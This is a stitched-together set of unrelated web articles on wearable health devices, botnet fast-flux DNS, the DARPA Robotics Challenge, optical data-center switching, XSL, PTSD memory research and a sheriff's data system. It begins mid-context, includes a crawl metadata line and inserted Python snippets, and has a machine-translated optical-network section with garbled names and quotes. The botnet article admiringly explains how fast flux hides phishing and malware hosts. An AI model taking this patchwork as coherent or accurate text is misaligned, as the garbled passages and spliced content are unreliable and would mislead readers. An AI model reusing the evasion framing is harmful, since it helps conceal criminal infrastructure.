If the FCC commissioners agree on Dec. 12 to move the proposal forward, it will then go through periods for public comment and response and probably would not take effect for several months or more.
The next innovation in health care may come from Silicon Valley.
With Google, Apple and Samsung exploring how to incorporate health IT features into wearable devices, patients may soon provide information to doctors through devices such as smartwatches that can measure and transmit biometric data. Health IT wearables will open a digital conduit so that, for instance, doctors can more readily monitor patients with chronic conditions while also cutting down the need for office visits.
"What's going to accelerate health as much as anything is consumer devices having [medical] features on them so that we're continuously collecting this data over a large population of patients," said Dr. Leslie Saxon, a cardiologist at the University of Southern California Keck School of Medicine and executive director and founder of the USC Center for Body Computing.
Companies like Apple, Google and Samsung "have the ability to, unlike medical companies, create continuous engagement with their users."
While none of these companies has health IT wearables generally available, each has shown interest in the market. Apple executives met with the U.S. Food and Drug Administration in December to discuss mobile medical applications, according to the agency's public calendar. The company is rumored to be developing a smartwatch with health IT functions and has hired staff with backgrounds in medical sensor technology.
The FDA's calendar also noted that Google last year met with agency representatives including the adviser on mobile medical applications and staff who regulate ocular and cardiovascular devices. Additionally, Google developed and is testing a prototype contact lens that can help diabetics monitor their blood sugar by measuring glucose levels in tears.
Samsung and the University of California, San Francisco, recently established a lab on the school's campus to test and validate medical sensors and digital health technologies.
"We are now seeing a transition to companies thinking about these [devices] in a much more rigorous way, that they are going to be used for maintaining wellness or treating disease," said Dr. Michael Blum, the associate vice chancellor of informatics at the UCSF School of Medicine and the director of the school's Center for Digital Health Innovation.
The first generation of wearable devices from companies like Fitbit and Jawbone collect information that people would find interesting, like the number of steps walked, but have somewhat limited use from a health perspective, said Blum, who is a cardiologist.
"They were based on very little science," Blum said. "They were really based on how can we build a device and make it a marketing success." These devices and the technology they use were never validated for accuracy and the metrics they measured were never scientifically proven to have wellness benefits, Blum noted.
For wearable devices to be accepted by physicians, they need to be "designed with the kind of 99-plus percent precision" that is expected from their clinical counterparts, Blum said. Without validation of the devices' ability to take accurate readings, patients and care providers can't rely on them and "they end up in a drawer," Blum said.
But physicians would welcome a new generation of scientifically valid wearables, since the high volume of data generated by such devices may lead to new ways of identifying disease symptoms, measuring wellness and discovering nontraditional vital signs, said Blum.
Most people spend their time outside of hospitals and wearable devices will give doctors data on how lifestyle affects a person's health, said Dr. Michael Docktor, a gastroenterologist at Boston Children's Hospital.
Given the huge installed base that the leading tech companies have, even limited use of wearables among their users could create useful data sets.
"You don't need much adoption or much continuous use to create a database that doesn't exist for medicine anywhere," USC's Saxon said. "If you have the largest database of 18-year-olds' heart rates and blood sugar and activity, you've got a very powerful data set. A couple of hundred million people all over the world is really compelling."
As keen as some doctors are on wearable devices, however, the health care system isn't ready to incorporate the technology. Care providers are focused on implementing and learning electronic-health-record (EHR) software, Blum said. When EHR systems are established, they're designed around storing data generated from a patient visit, not information from a wearable device, he added.
The data analysis component of health IT is still developing, said Blum. Don't expect to upload wearable data to Google or Apple's cloud for analysis, he said.
"The vision is the doctor is sitting waiting for all this, and the doctors aren't. They're running around with their hair on fire trying to do what they do right now," Blum said.
Eventually, companies that specialize in handling high-volume data will partner with the medical community to better understand the health care ecosystem and offer analysis applications.
"It's kind of a little naA-ve to think that a company that's developing new sensor technology [is] also going to have the wherewithal to develop analytics for it," Blum said. "And whether they're going to have the scientific insights and background to know what's relevant and then figure out what should get pushed to the clinician."
Some physicians and software developers may opt to build applications for specific medical conditions that push relevant data to clinicians, Docktor of Boston Children's Hospital said. "I think it's going to be people independently hacking the system," he said.
Google, in particular, will "really make a compelling argument for hacking cool solutions for medical applications." Docktor added that the company already followed this route by making an SDK (software development kit) available for its Glass headset.
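As a toy illustration of the kind of condition-specific app Docktor describes, and not any vendor's actual API, the sketch below filters a stream of hypothetical heart-rate readings from a wearable and pushes only out-of-range events toward a clinician. The thresholds, record format and notification step are all invented for the example.

```python
from dataclasses import dataclass
from datetime import datetime

# Made-up limits for illustration only; real limits would be set per patient
# by a clinician, not hard-coded.
HR_LOW, HR_HIGH = 40, 120

@dataclass
class Reading:
    patient_id: str
    timestamp: datetime
    heart_rate: int          # beats per minute reported by the wearable

def notify_clinician(reading: Reading) -> None:
    # Placeholder for whatever secure channel a care team actually uses
    # (EHR inbox, pager, HIPAA-compliant messaging, and so on).
    print(f"ALERT {reading.patient_id}: {reading.heart_rate} bpm "
          f"at {reading.timestamp:%H:%M}")

def triage(readings):
    """Forward only out-of-range readings so clinicians see signal, not noise."""
    for r in readings:
        if not HR_LOW <= r.heart_rate <= HR_HIGH:
            notify_clinician(r)

triage([
    Reading("patient-001", datetime(2014, 6, 1, 8, 0), 72),
    Reading("patient-001", datetime(2014, 6, 1, 8, 5), 134),   # gets flagged
])
```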
Meanwhile, every party involved in health IT realizes that data security "is critically important," said Blum. The challenge is keeping data secure while preserving its "fluidity" so it can be added to larger databases and used to advance medicine.
How, and if, IT companies have to comply with the Health Insurance Portability and Accountability Act (HIPAA), a U.S. government regulation that deals with health data security and privacy and how the information is exchanged, depends on what products they develop.
To avoid having to develop HIPAA-compliant services, IT vendors may make people responsible for managing and sharing their data instead of developing a physician portal, Docktor said.
"I imagine -- and I think it skirts the HIPAA issue -- but if a patient is sending the data directly to their physician it kind of gets around it," he said. "How [data] is transmitted to the physicians and what we do with that data is really in its early days, and I don't know who's going to win there."
In an economy that monetizes private data, companies that collect or handle biometric data could potentially sell it to third parties, said Saxon. This business model raises privacy concerns, even when data is stripped of details that link it to specific individuals, and people may deserve compensation for contributing their information to a database created from wearable device data, she said.
"Even if they get some kind of service or device for free from Google, at the end of the day if that data is going to be sold should people be compensated? I don't know the answer. But if somebody plans on making money from it then we should be thinking about it," Saxon said.
Of course, finding value in and safeguarding data won't be a problem if people don't start using wearable devices in the first place, or stop using them after a while.
To get people interested in using health-oriented wearables, the devices need to offer data that users can learn from, Saxon said. To do that, the data such devices collect could be integrated with features from other applications so that, for example, a wearable user could get content on what foods to eat to increase blood sugar if it got too low.
Data and device consolidation could also boost the popularity of wearable devices, Saxon said. Instead of uploading data from five sensors to different clouds, people could use one application or device that stores their information in one place.
Ultimately, people want well-designed, reliable consumer products that fit into their lifestyles -- areas that Apple, Samsung and Google specialize in, Blum said.
"Who anticipates Apple developing something that is ugly that no one wants to wear?" Blum said.
The major tech companies have an opportunity to make a big impact on medicine, because if health IT wearable devices really take off, health care won't function the same way.
"We're on the precipice of an absolute sea change of how medicine works," Docktor said. "It's going to open up the window for more preventative care, more remote care and better monitoring of patients outside of the hospital because that's generally where 99.9 percent of their time is hopefully spent." | <urn:uuid:07aff24d-980f-4452-ad0f-d3e4dd88ea5b> | CC-MAIN-2017-09 | http://www.cio.com/article/2376612/consumer-technology/wearable-devices-with-health-it-functions-poised-to-disrupt-medicine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00436-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.966334 | 1,808 | 2.78125 | 3 |
For anyone looking to create their own global compute cloud, the botnet serves as the perfect blueprint for a resilient, fault-tolerant network. Lately botnets are proving to be more resilient and harder to shut down than any other form of cloud technology. So needless to say, we can learn a lot from our criminal counterparts.
One of the big reasons botnets are so hard to take down is how they obscure the domain by constantly mapping it to different bots within the network, according to a recently released study (PDF). This approach to fault tolerance may be a model for our work in the cloud.
The study's authors, Jose Nazario of Arbor Networks and Thorsten Holz of the University of Mannheim, tracked the traffic of 900 fast-flux domain names used by botnets during the first six months of 2008 and learned quite a bit about the inner workings of the most powerful botnets, and specifically their use of fast flux.
According to Wikipedia, "fast flux" describes how botnets constantly change the mapping of a hard-coded domain name to different bots within the network. Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies. It can also refer to the combination of peer-to-peer networking, distributed command and control, web-based load balancing and proxy redirection used to make malware networks more resistant to discovery and countermeasures, and it is ideally suited to the management of cloud-based infrastructures.
The simplest type of fast flux, referred to as "single-flux", is characterized by multiple individual nodes within the network registering and de-registering their addresses as part of the DNS A (address) record list for a single DNS name. This combines round robin DNS with very short TTL (time to live) values to create a constantly changing list of destination addresses for that single DNS name. The list can be hundreds or thousands of entries long. (This is very similar to the way we handle distributing the user access / load within our Enomaly Elastic Computing Platform)
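To make the single-flux idea concrete, here is a small, purely illustrative simulation, not code from the study or from any real botnet, of a resolver handing out a constantly rotating set of A records with a very short TTL. The address pool, TTL and record count are invented for the example.

```python
import random

TTL_SECONDS = 180            # deliberately short, so cached answers expire fast
RECORDS_PER_ANSWER = 5       # how many A records each response advertises

# Hypothetical pool of compromised hosts ("bots") fronting the real content.
bot_pool = [f"10.0.{i // 256}.{i % 256}" for i in range(1000)]

def resolve(domain):
    """Return a single-flux style answer: a fresh, short-lived A-record set."""
    return {
        "name": domain,
        "ttl": TTL_SECONDS,
        "a_records": random.sample(bot_pool, RECORDS_PER_ANSWER),
    }

# Two lookups a few minutes apart see almost entirely different addresses,
# which is why blocking individual IPs does so little to take the domain down.
print(resolve("example-flux-domain.com")["a_records"])
print(resolve("example-flux-domain.com")["a_records"])
```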
A more sophisticated type of fast flux, referred to as "double-flux", is characterized by multiple nodes within the network registering and de-registering their addresses as part of the DNS NS record list for the DNS zone. This provides an additional layer of redundancy and survivability within the malware network.
The study found that fast-flux botnets were often active for a few hours to a few months. The domains that were used were registered, but sometimes laid dormant for several months. Online fraud and crime most associated with these botnets included phishing sites, pharmacy sites, and malware distribution sites.
I'll keep you posted as I learn more about this fast flux approach.
DARPA's $2M challenge: Robots that drive, use tools, stop leaks
- By Henry Kenyon
- Apr 11, 2012
In the not-too-distant future, putting out hazardous chemical fires, working on damaged nuclear reactors and other dangerous emergency response jobs may be handled by robots.
The Defense Department’s cutting-edge research and development shop is looking for next-generation machines capable of working in a human environment by doing things such as driving vehicles, climbing ladders, handling power tools and turning pipe valves.
To push the boundaries of robot technology for disaster relief operations, the Defense Advanced Research Projects Agency is launching its Robotics Challenge. The structure of the challenge, which begins in October, is similar to those the agency ran in recent years to develop autonomous ground vehicles: robots developed by participating teams will compete against each other for a cash prize. In this case the winning team will be awarded $2 million.
A key thrust of the program is developing robots that can use available human tools in a disaster site, from vehicles to hand tools. DARPA also wants technologies that allow non-expert operators to control robots, lower operator workload, and permit effective operation in degraded, low bandwidth and intermittent communications environments.
The Robotics Challenge consists of three major events: a virtual disaster challenge and two disaster response challenges. Like DARPA’s previous contests for autonomous ground vehicles, the robots in this event will compete with each other. The current event will focus on disaster response scenarios in this sequence:
- Drive a utility vehicle at the site.
- Travel dismounted across rubble.
- Remove debris blocking an entryway.
- Open a door and enter a building.
- Climb an industrial ladder and move along an industrial walkway.
- Use a tool to break through a concrete panel.
- Locate and close a valve near a leaking pipe.
- Replace a component such as a cooling pump.
While the robots must be compatible with human operators, environments and tools, they are not required to have a humanoid form, DARPA officials said. But the robots must be able to get into, drive and navigate a standard, unmodified utility vehicle along a roadway.
For the other tests, robots will have to move across rubble; move along human-sized industrial ladders and walkways; detect and close leaking valves; handle power tools, and be able to locate, remove and replace a pump that a human would be able to physically carry and manipulate.
It is up to the participating teams to decide how autonomous their robots will be, DARPA officials said. Human operators will supervise the robots in all of the events, but for highly autonomous machines, this could mean only a few high-level commands via a relatively low data rate communications link. For less autonomous robots, more low-level commands and the need for more sensor data from the robot to the operator will require higher data rates.
As a part of the challenge, DARPA wants to make robot hardware and software development more accessible and to lower acquisition costs while increasing capability. The agency will create and provide Government Furnished Equipment (GFE) to some participants. Officially referred to as the GFE Platform, it consists of a man-sized robotic system with arms, legs, a torso and a head. The GFE Platform will allow teams without hardware expertise, or even hardware, to participate, agency officials said.
Along with the GFE Platform the agency will develop a GFE Simulator, an open-source, real-time, operator-interactive virtual test bed system. The simulator will run models of robots, robot components and field environments prior to physically validating them on hardware systems.
By using a widely available and affordable validation system to test software and hardware components, DARPA wants to create an environment where developers can quickly create and test new robot designs at minimal cost and with high confidence of success.
Traditional network equipment has been unable to cope with the huge data traffic
One morning in 2011, an engineer at Facebook, the world's most popular social network, pressed a button and brought the company's entire business to a standstill. This unnamed engineer hadn't done anything he wasn't supposed to do. He was simply trying to run a routine task on Hadoop, the distributed data-analysis platform the social networking giant has long relied on. As a result, Facebook began analyzing the data generated by its hundreds of millions of users, data stored on tens of thousands of servers across the company's multiple data centers. And to analyze that data, all of those servers had to start talking to each other.
Facebook employee Donn Lee recalled the incident at a conference in the spring of last year: a Hadoop task overwhelmed the company's computer network and brought nearly everything else to a standstill. "I clearly remember that morning," Lee said. "It paralyzed Facebook, very serious paralysis."
In the past, the majority of network data traffic moved back and forth between servers and the Internet users trying to reach the web. But now, as businesses such as Facebook, Google and Amazon grow ever larger and more complex, traffic between servers inside the data center has surged, and the traditional network equipment these networking giants use can no longer handle so much traffic.
The network is therefore changing with the times. Companies such as Facebook and Google are building faster network hardware and revising their network topologies to accommodate the heavy flow of traffic between servers. Such improvements only go so far, however, and network experts like Donn Lee have begun to consider new network equipment: gear that uses beams of light to carry data inside the data center.
Electronic and fiber-optic networks, neck and neck
Yes, some Internet data is already transmitted in the form of light. That is the fiber-optic network: standard electronic signals are converted into photons and carried along glass fiber-optic cables.
Under normal circumstances, however, such transfers typically occur between data centers and rarely within one. The next step is to rebuild the data center around fiber-optic networking, so that optical fabric switches, running neck and neck with traditional electronic network switches, can greatly accelerate the speed of data transmission between servers.
“If we can do this, this hybrid network– can be adapted to large-scale network of more data traffic- very attractive.” God Diego campus of the University of California researcher George fiber optic network George Papen said, ” We are yet to reach this point, but we are closer than ever before.”
The R&D team at Papen's campus has developed such a hybrid network, which is still in the testing phase and demonstrates the working principle of fiber-optic switches. Their research project, usually known as Helios, is funded by Google and other tech giants.
According to Papen, the Helios project still has a long way to go before it is fully realized. However, a start-up company in Cambridge, Massachusetts, named Plexxi recently launched a fiber-optic network switch designed to re-create the data center. Although this technology is completely different from Helios, the two share the same basic goal.
“Photonic switching function is very powerful, once your business is involved in the field of optical fiber exchange, rather than the field of electronic exchange, you will have the advantage of internal performance.” CEO David – Plexxi Company, said Husak (Dave Husak)”We are committed to achieve that effect.”
Future of the Helios project
Traditionally speaking, the network is hierarchical. Servers sit at the bottom level, and they connect to network switches one level up. Those high-level switches connect to higher levels of high-speed networking equipment, and that equipment in turn connects to a level higher still. By the time you reach the core of the network, you are running very expensive network hardware that is much faster than the switches at the server level.
You need that faster speed to handle all of the traffic coming up from the network, or at least that was the prevailing view. Amin Vahdat and colleagues showed that this hierarchy is wrong: if you use larger numbers of slower, generally cheaper network equipment, you may be able to run your network more efficiently.
“This is a revolution.” Papen said, “Before this, people like the construction of telecommunications networks to build their data center, Vahdat of the research team realized that to do so is difficult to cost savings, they proved that you can use a completely different way to build a data center. “
This unified network architecture is known as a "fat tree" design. It has now become a near-universal form among large-scale network businesses. That's why companies such as Google have begun to abandon expensive equipment from vendors such as Cisco and instead purchase low-cost hardware from manufacturers in Asia.
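For a sense of why the fat-tree design appeals to large operators, the following sketch uses the textbook k-ary fat-tree construction, not Google's or Facebook's actual topology, to count how many identical commodity switches and hosts a single cheap port count supports.

```python
def fat_tree_stats(k):
    """Sizing for a classic k-ary fat tree built from identical k-port switches."""
    if k % 2:
        raise ValueError("k must be even")
    edge = aggregation = k * (k // 2)    # k pods, k/2 switches per layer per pod
    core = (k // 2) ** 2
    hosts = k * (k // 2) * (k // 2)      # each edge switch serves k/2 hosts
    return {
        "ports_per_switch": k,
        "edge_switches": edge,
        "aggregation_switches": aggregation,
        "core_switches": core,
        "total_switches": edge + aggregation + core,
        "hosts_supported": hosts,
    }

# With ordinary 48-port switches, the same inexpensive box used at every level
# supports tens of thousands of servers, with no expensive core router needed.
print(fat_tree_stats(48))
```

The point of the exercise is that every level uses the same modest switch, which is exactly the property that lets operators swap pricey core gear for commodity hardware.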
The basic idea of the Helios project is to create a true fiber-optic network inside the data center, eliminating the burden on the traditional electronic network.
In a sense, this project is a trip back to the future. Today's networks use so-called "packet switching" to transfer data back and forth, breaking it into smaller packets of information before sending it out; this is the way the Internet operates. The fiber portion of the Helios project, however, uses "circuit switching," establishing a dedicated link between two endpoints. This is how old-fashioned telephone networks ran.
“Just look at each packet in the data center, you will find that it does not have to use your resources efficiently.” Papen said, “If you can understand, even partially understand the transmission of data traffic direction, you do not have to view each header of each packet, you will be able to create a dedicated circuit to transmit large amounts of data, rather than let it through the packet-switched network. ”
This structure is very attractive because fiber-optic circuit-switched networks are more flexible than the traditional design. "A circuit is a pipeline. It doesn't care what the data transmission speed is; it is speed agnostic," he said. "You can transmit data over it at almost any speed, which is very attractive."
This architecture still has a long way to go before it becomes a reality in the data center, but Papen believes it will eventually be realized.
Vahdat and Google are likely the closest to making it a reality, but Papen stressed that even he doesn't know what Google will do. "I have a lot of friends engaged in fiber in large data centers; however, I still do not know what they are prepared to do," he said.
For Google, the most important competitive advantage is the design of its internal architecture. Google does not want to disclose this design, even to the outside researchers it funds. But Google is not the only company exploring the future of the switched fabric. So are Facebook, Cisco, IBM and now Plexxi.
What is it?
Extensible Stylesheet Language (XSL) is a style sheet format for XML (Extensible Markup Language) documents. It is the XML counterpart to the Cascading Style Sheets (CSS) language in HTML (Hypertext Markup Language).
Unlike HTML, which uses predefined tags (for instance, < p > meaning paragraph) that are understood by browsers, there is no standard way of displaying an XML document. As the World Wide Web Consortium (W3C) puts it, "An XSL stylesheet processor accepts a document or data in XML and an XSL stylesheet, and produces the presentation of that XML source content that was intended by the designer of that stylesheet."
Where did it originate?
With the W3C. The XSL Working Group, formed in 1998, is co-chaired by IBM and Adobe. It is based on two older stylesheet languages, CSS and the Document Style Semantics and Specification Language (DSSSL). XSL is intended to be suitable for the general user as well as the professional, whereas DSSSL is strictly for the expert. CSS and XSL are complementary. XSL can transform XML documents into CSS/HTML documents which CSS can then format.
Microsoft played a benign role in the development of XSL. Deciding that XSL was too complex and too broad in its approach, since most people simply wanted to output HTML, it took the transformation aspects of XSL and ran with them. As a result, XSL was split into two: XSL itself, also known as XSL Formatting Objects (XSLFO), and XSL Transformation (XSLT).
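As a small illustration of the transformation half of that split, here is a sketch using the lxml library for Python (one XSLT processor among many, not one endorsed in this article) that applies a tiny XSLT stylesheet to a toy XML document and emits HTML, which CSS could then format. The element names are invented for the example.

```python
from lxml import etree

# Toy XML source document; the tag names are invented for the example.
xml_doc = etree.XML("<report><title>Quarterly figures</title></report>")

# Minimal XSLT stylesheet: turn <report>/<title> into an HTML heading.
xslt_doc = etree.XML("""\
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/report">
    <html><body><h1><xsl:value-of select="title"/></h1></body></html>
  </xsl:template>
</xsl:stylesheet>""")

transform = etree.XSLT(xslt_doc)      # compile the stylesheet
html_result = transform(xml_doc)      # apply it to the source document
print(etree.tostring(html_result, pretty_print=True).decode())
```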
What is it for?
XSL provides a model and vocabulary for writing stylesheets using XML syntax. According to the W3C, presentation means "how the source content should be styled, laid out, and paginated onto some presentation medium, such as a window in a Web browser or a handheld device, or a set of physical pages in a catalogue, report, pamphlet, or book".
The XSL Working Group says, "Aimed, by and large, at complex documentation projects, XSL has many uses associated with the automatic generation of tables of contents, indexes, reports and other more complex publishing tasks."
What makes it special?
Without a stylesheet, a processor would render the content of an XML document as a string of undifferentiated characters. XSL provides much more flexible and sophisticated layouts and pagination than were possible before.
How difficult is it?
The term "human-readable" makes XML and XSL seem like something anybody can pick up, but Chris Harris-Jones, a consultant with analyst firm Ovum, warns that this is true only in the same way that all European languages are human-readable. "You need to understand the tag sets they are written in," he explains.
There is a good selection of tools to make XSL easier, including ActiveState's Komodo, Excelon's Stylus Studio and IBM's XSL Editor.
Where is it used?
Wherever XML documents are used.
What does it run on?
XSL, like XML, is supplier- and platform-neutral - although there were compatibility problems with Internet Explorer 5.0, which was released before the XSL standard was firmed up.
Few people know that
XSL can be entertaining. See the IBM paper "XSL for Fun and Diversion" at www-106.ibm.com/developerworks/library/hands-on-xsl. Alternatively, try to get out more.
What is coming up?
XML schemas for UK local elections.
Rates of pay
XML, along with XSL, is used in almost every kind of software and database development, and the range of salaries is correspondingly large.
There are dozens of free XSL tutorials online. Try the W3C Web site (www.w3c.org/Style/XSL), www.w3schools.com and IBM's Developerworks (www-106.ibm.com/developerworks), for starters.
Before he lost the ability to sleep through the night; before the panic attacks started; before he drove his truck over an improvised explosive device, leaving him with traumatic brain injury; before a second roadside bomb did the same thing a few weeks later—before all of that, on the U.S. military base near Kandahar, Afghanistan, soldier Kevin Martin liked to think about the science-fiction movie Inception.
“My friends and I used to joke during our time in Afghanistan that we were going to take all the money we had and pay someone to Incept us,” he says—referencing the film’s premise of implanting or extracting information from a person’s mind as they sleep—“so that we could put a cooler, not-as-bad memory of Afghanistan in our brains and go on with the rest of our lives.”
Thus far, no such treatment exists for Martin, 23, who returned to the U.S. in 2012 and was diagnosed with post-traumatic stress disorder earlier this year. Now a sophomore at Trinity College, he’s considered 30 percent disabled by the Department of Veterans Affairs for his PTSD (he’s also 10 percent disabled for an unrelated shoulder injury) and takes prescription anti-anxiety medication to ease his symptoms.
But researchers have begun to investigate a possible treatment similar to the one Martin imagined: A paper recently published in the journal Biological Psychiatry argues that it may be possible to treat PTSD by altering patients’ memories.
The paper reviews a growing body of scientific literature on memory reconsolidation, a relatively new (and, in humans, still somewhat contentious) concept in which old information is called to mind, modified with the help of drugs or behavioral interventions, and then re-stored with new information incorporated—like a piece of metal that’s been melted down, remolded, and left to harden into a different shape.
Though different types of memories are solidified in different ways—the fear-driven memory of driving over a bomb, for example, will make its way through the brain differently than a mundane memory of yesterday’s breakfast—there are general neurological processes that all memories follow.
“In memory research, we talk about three parts,” explains Ken Paller, director of the cognitive neuroscience program at Northwestern University. “The first part is the acquisition or coding of a memory,” in which our brains process the information our senses are sending, “and the last part is retrieving a memory. And in between, we talk about consolidation,” the process by which sensory information—a sight, a taste—solidifies into fully-formed memories to be stored for the long term.
Typically, the more often memories are recalled, the stronger they become. “If you’re trying to memorize something in a book, you sit there and repeat it over and over,” explains Wendy Suzuki, a researcher at New York University’s Center for Neural Science. “That’s also an example of how things get consolidated. You repeat [them] over and over.”
But with reconsolidation, the researchers explain, consciously recalling a memory is also what allows it to be manipulated. “[Memories] are not necessarily fixed but can be changed long after storage,” they write. “Seemingly stable memories may re-enter an unstable state when they are retrieved, from which they must be re-stabilized … During reconsolidation, memories are susceptible to modification again.”
One way is by distracting the brain as it recalls, or “activates,” memories: People who were asked to memorize two separate lists of objects, for example, did worse on the second list after they were reminded of content from the first, while people who were asked to memorize a folk tale before recalling autobiographical events described their memories in less detail than those who had not seen the story.
Perhaps more compelling for the treatment of PTSD, though, are the experiments that involve tampering with fear-driven memories using pharmaceuticals. In one study, published in Nature Neuroscience, volunteers were stimulated to generate fear memories after being subjected to loud noises and images of spiders; later on, one group was given propranolol (a beta-blocker used to slow heartbeat and sometimes used in the treatment of anxiety disorders) before being made to recall the fearful experience, while the other was given placebo pills. When the two groups were again reminded of the memory days after the experiment began, those who had taken the propranolol showed markedly less fear than those who had not.
A study from the journal Psychoneuroendocrinology found a similar effect with propranolol in subjects who were asked to imagine a fearsome event that hadn’t actually happened—when they were made to recall the imagined scenario, the chemical eased their response much as it had done in experiments with real fear memories. (People with PTSD, it bears noting, can exhibit symptoms of the disorder even if it was someone close to them who actually experienced the trauma; journalists frequently exposed to violent images can develop PTSD even from the safety of their newsrooms.)
Compared to Martin’s hypothetical Inception scenario, the types of modification discussed in the research review are decidedly less dramatic. Based on the studies presented, reconsolidation appears to be much less heavy-handed than its science-fiction analogue—a lessening of the emotions associated with the memory or the dulling of its details, rather than the total mental eradication of an event or the creation of a new one from scratch.
But still, the idea of reconsolidation broaches new territory for possible relief from PTSD, which affects an estimated 7 to 8 percent of Americans, by addressing its root cause rather than its symptoms. Cognitive processing therapyand exposure therapy, two common behavioral treatments, focus on coping skills and controlling fear, and according to the National Institutes of Mental Health, only two medications—the antidepressants Zoloft and Paxil—are currently approved by the U.S. Food and Drug Administration explicitly for the treatment of PTSD, though other antidepressants and anti-anxiety medications are often prescribed to treat the emotional effects characteristic of the condition.
Some psychologists, however, remain skeptical that this particular area of memory research is the answer.
Despite the findings of some of the studies addressed in the Biological Psychiatry review, the bulk of the research on reconsolidation thus far has involved lab animals rather than humans, explains Paul Reber, director of Northwestern University’s Brain, Behavior, and Cognition program—and mapping rodent brains doesn’t provide adequate insight to the intricate, messy workings of human memory, where something as seemingly inconsequential as a smell or a snippet of music can pull forward a rush of emotions from events past.
“In animal studies, you have the greatest control over the neural systems, but you don’t have any access to the subjective experience of memory,” he says. “So you can build models of things you think might be related to what humans experience with PTSD, but you don’t really know how they’re connected.”
Paller, too, questions the faith that some have placed in reconsolidation, arguing that it stems from an oversimplified understanding of the way that memories are processed in the first place. Rather than something that must be de-stabilized in order to change, a memory is a constantly shifting entity, continually updated with new context even when it isn’t being consciously recalled.
“It’s a lot different than when you put some information in your computer and just expect to get that out in the same form,” he explains. “If you learn something on a Wednesday and you learn new information the next day, that can change the memory that you stored. So every time that we learn something, subsequent events can color it differently.”
”The more sophisticated view of consolidation is, [it] can strengthen a memory, but it doesn’t reach a permanent stage ever,” he says.
Whether or not reconsolidation is a viable possibility for PTSD treatment may still be up for debate; whether or not it should be a possibility, though, is another question altogether.
Slippery philosophical quandaries abound: Does the act of taking a pill to change memory require different ethical considerations than something like psychotherapy or hypnotism? Could it pave the way for more ominous applications? And is the altering of memories a humane way of helping those who suffer, or is it some fundamental violation of what makes humans, well, human?
But on the flip side, if some people are biologically predisposed to PTSD, wouldn’t this be a way of leveling the playing field, of helping people unlucky enough to become victims of their bodies’ own chemistry?
“People say, ‘Well, it’s just wrong to interfere with the natural in the realm of memory,’” says Peter Kramer, a psychiatry professor at Brown University who studies medical ethics, “but the natural in the realm of memory does involve reshaping and forgetting. Maybe the injury is more like the unnatural.”
As the body of existing reconsolidation research expands—and as soldiers continue to return home burdened by the trauma of their experiences—it’s an issue that those who study the brain are likely to grapple with more and more often.
“I was at a conference not that long ago where the idea was brought up,” Reber says, “and it led to a lot of animated discussion: If you could edit your own memories, are there any memories you’d want to get rid of? If you have a memory of a painful event, do you lose some part of yourself if you get rid of it? Would that be worth the trade?”
“Obviously,” he adds, “it’s not a simple question.”
Los Angeles County is the largest county in the nation. Its population of approximately 9.9 million is exceeded by only eight states.
There are 88 cities in L.A. County, covering a geographic span of 4,081 square miles. Yet 65 percent of the county -- home to a million people -- remains unincorporated. Those people and the citizens of some 40 of the 88 cities look to the men and women of the Los Angeles County Sheriff's Department -- the largest sheriff's department in the world -- for police protection.
To handle the enormous number of calls generated by such a Herculean endeavor, the sheriff's dispatch system was overhauled in the early '90s. The Mobile Digital Communications System (MDCS) that resulted allows patrol officers to receive calls and acknowledge them through a mobile digital terminal (MDT). The MDT can also query online against justice agency databases such as the Department of Motor Vehicles and the Wanted Person System.
Unfortunately, the deployment of one tool sometimes renders another obsolete or, worse, unusable. So it was with the Mobile Digital Communications System and the original Regional Allocation of Police Services System (RAPS). RAPS is a data-management system that tracks the activities of deputies in the field for the purpose of billing contract cities and to determine the appropriate allocation of personnel.
The old RAPS system was housed on a mainframe and obtained its data from paper logs prepared by deputies. This data was used to justify additional sales of service to contract cities. The reports also helped law enforcement determine if a particular area needed more law enforcement attention.
However, according to Sergeant John Aerts, who was responsible for billing some of the contract cities, the reports were often late. "I would get the reports a month late. In May I would know that I had been 600 minutes short in a particular city [in April]."
But once MDCS eliminated the need for the paper log, those reports went from late to non-existent. Suddenly, L.A. County had no way to track deputies, gather data or compile statistics.
The solution was a program that could receive data directly from the dispatch system, store it and present it in a useful manner. The system would bear the name RAPS, the same name of the system it replaced.
David Ramirez, currently the Data Center manager for the L.A. County Sheriff's Department, was working for the county at that time as a consultant to the sheriff's department and became the main developer of the system. "We developed an application using Oracle RDBMS and tools that captured the data directly from the dispatch system," said Ramirez. "It still carries the same name, but is radically different technology."
Because it was to be an enterprise-wide system, a steering committee was appointed. Twelve RAPS coordinators were selected to serve on the steering committee, one of whom was Sgt. Aerts. Ramirez considered this an asset. "We would not have been able to do it without John's expertise in the department's business practices ... He has a better understanding of community needs than anyone and wanted to make sure the system could provide statistics to justify the allocation of additional manpower in the communities."
Sgt. Aerts looked at RAPS as a way to make life easier. "It gives you a daily or monthly look at exactly where you are. You know if you are short and have to add cars in a particular area."
RAPS captures data from the MDCS in a download every 24 hours at 4 a.m. The data is processed and stored and available online via Oracle's Forms graphical user interface. "It was designed," Ramirez said, "to be intuitive and totally user friendly."
There are currently about 10 years worth of data on the system. The data is up-to-date within the 24-hour timeframe that it takes to be downloaded from MDCS.
While MDCS allows for realtime inquiries, the data is only available for seven days and there is no historical record of changes to it. RAPS captures and processes all changes to the records during the seven days it is retained in MDCS.
RAPS captures data such as how many times a patrol vehicle has been dispatched to a particular location and how much time deputies spend in various activities. From the moment he or she signs on to the system, the deputys time is tracked. Each time the deputy acknowledges a call or begins or ends an activity, a time stamp is created.
Wendy Harn, assistant director of Management Information Services for the sheriffs office, is a user of the system. "RAPS basically automated the Deputy Daily Log, which was a manual system of logging all deputy activities on a shift," she said. "It contains call history by location, observation activity and detail activity. Information is available by location, unit, station, call types, etc."
Once data is entered, it cannot be changed. "RAPS is a read-only system," said Ramirez. "The user has the ability to download the data onto a spreadsheet and massage it if desired. But the data within RAPS is legally binding and must reflect the original MDCS data."
Harn, whose department is responsible for reporting crime statistics, the crime analysis program and GIS, said RAPS helps the communities within the county because it "allows for more efficient monitoring of the types of service being provided and where."
She also believes it aids officer safety by providing online access to address history, so an officer knows in advance whether there have been previous problems in a particular area and whether or not back-up will be needed.
Overall, RAPS provides the Los Angeles County Sheriffs office with data showing how deputies spend their time. It also ensures the contract cities get their moneys worth, helps protect officers by providing historical information about people and places, and improves public safety by putting police protection where it is needed most.
